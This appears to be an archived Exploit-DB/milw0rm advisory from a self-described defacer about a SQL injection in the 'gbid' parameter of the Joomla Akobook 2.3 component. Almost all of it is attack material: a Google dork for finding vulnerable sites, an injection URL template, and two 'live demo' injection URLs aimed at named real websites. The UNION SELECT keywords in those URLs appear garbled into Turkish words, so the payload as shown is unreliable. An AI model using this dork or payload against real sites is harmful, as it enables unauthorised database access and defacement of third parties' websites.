Joomla! Component Akobook 2.3 - 'gbid' SQL Injection

EDB-ID:

8911


Author:

Ab1i

Type:

webapps


Platform:

PHP

Date:

2009-06-09


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

Joomla Component com_akobook Vulnerability
----------------------------------------------------------------------
 ###################################################
 [+] Author        :  Ab1i
 [+] Email         :  ab1i_usta@hotmail.com
 [+] Dork  : inurl:index.php?option=com_akobook
 ###################################################
________________________________________________________
Example:
http://localHost/path/components/index.php?option=com_akobook&Itemid=36= ( SQL code )

Demo Live (1):
http://lesnyak.ru/index.php?option=com_akobook&Itemid=31/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1%20+%20birliği%20+%20+1,2,3,4,5,6,7,8,9%20seçin%20,%2010,11,12,13,14,15,%2016,17,18,19%20/%20*
Demo Live (2):
http://www.prostatitunet.ru/index.php?option=com_akobook&Itemid=31/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1%20+%20birliği%20+%20+1,2,3,4,5,6,7,8,9%20seçin%20,%2010,11,12,13,14,15,%2016,17,18,19%20/%20*
++++++++++++++++++++++++++++++++++++++++++++++++++
www.ayyildiz.org
Türk 'ün Türkten başka dostu yoktur . Sizde Türk siteleri Destek olun ....
Turkish Defacers Ab1i
Eno7 , The_Bekir , Bgh7 , m0sted , Beygazi . Ustalara Selam olsun :)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

<name>AkoBook</name>
<creationDate>09.04.2006</creationDate>
<author>Melikyan Sergey aka SaD</author>
<copyright> This component is released under the GNU/GPL License.  </copyright>
<authorEmail>contact@saddo.ru</authorEmail>
<authorUrl>http://saddo.ru/</authorUrl>
<version>SE 2.3</version>

# milw0rm.com [2009-06-09]